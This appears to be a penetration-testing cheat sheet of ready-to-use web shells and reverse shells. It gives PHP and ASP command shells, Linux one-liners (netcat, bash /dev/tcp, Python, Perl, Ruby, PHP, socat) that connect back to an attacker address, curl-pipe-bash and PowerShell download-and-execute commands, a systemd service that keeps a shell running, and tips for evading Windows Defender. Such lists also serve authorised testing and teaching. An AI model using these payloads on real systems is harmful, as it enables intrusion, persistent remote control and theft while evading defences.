Skip to content

Reverse Shells

Web Shells

POST request shell
$_REQUEST

Benefits of using a POST request shell

Less likely to show up in logs

Less bad characters

PHP Shells
<?php system($_REQUEST["cmd"]); ?>
<?php system($_REQUEST['cmd']); ?>
<?php system($_GET["cmd"]); ?>
<?php system("<bash command>"); ?>
<?php echo "START<br/><br/>\n\n\n"; system($_GET["cmd"]); echo "\n\n\n<br/><br/>END"; ?>
.asp shell
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
.asp shell
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
.asp shell
<%
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell4444.exe",0,True)
%>
.asp shell
msfvenom -f asp
msfvenom -f aspx

Linux Reverse Shells

nc <attacker_ip_address> <port> -e /bin/bash
bash
bash -c 'bash -i >& /dev/tcp/<ip address>/<port> 0>&1'
curl
curl http://<ip address>/shell.sh | bash
wget
wget http://<ip address>/shell.sh -O /tmp/shell.sh
nc
nc -e /bin/sh <ip address> <port>
rm
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip address> <port> >/tmp/f
perl
perl -e 'use Socket;$i="<ip address>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<ip address>\",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php
php -r "\$sock=fsockopen(\"<ip address>\",<port>);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
ruby
ruby -r socket -e "f=TCPSocket.open(\"<ip address>\",<port>).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)"
socat
Set up listener:
socat file:`tty`,raw,echo=0 tcp-listen:80

Execute reverse shell:
socat tcp-connect:<ip address>:<port> exec:/bin/sh,pty,stderr,setsid,sigint,sane
Linux service reverse shell
[Service]
Type=notify
ExecStart=/bin/bash -c 'nc -e /bin/bash <ip address> <port>'
KillMode=process
Restart=on-failure
RestartSec=40s
[Install]
WantedBy=multi-user.target


systemctl link <.service file>
systemctl start <service>

Windows Reverse Shells

Enumerating command execution
<command>
cmd <command>
cmd.exe <command>
cmd /c <command>
cmd.exe /c <command>
C:\Windows\System32\cmd.exe <command>

Locations to write shell to:

  • C:\Windows\System32\spool\drivers\color\
  • C:\Windows\Temp
netcat reverse shell
nc <ip address> <port> -e cmd
nc <ip address> <port> -e powershell

Try both nc.exe and nc64.exe

Powershell reverse shell

  • Run with Nishang powershell reverse shell script
  • Windows Defender evasion - if Windows is blocking the script from running
    • Remove all usage comments from the reverse shell script
    • Rename the shell file to something not suspicious
    • Change the "Invoke" method name
Download and run powershell script
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"
powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"
IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)
Base64 Encoded powershell
echo "IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)" | iconv -t utf-16le | base64 -w 0
powershell -e <Base64 Encoded Shell>
powershell -EncodedCommand <Base64 Encoded Shell>

socat reverse shell

Set up listener
`tty`,raw,echo=0 tcp-listen:80
Execute reverse shell
socat tcp-connect:<ip address>:<port> exec:/bin/sh,pty,stderr,setsid,sigint,sane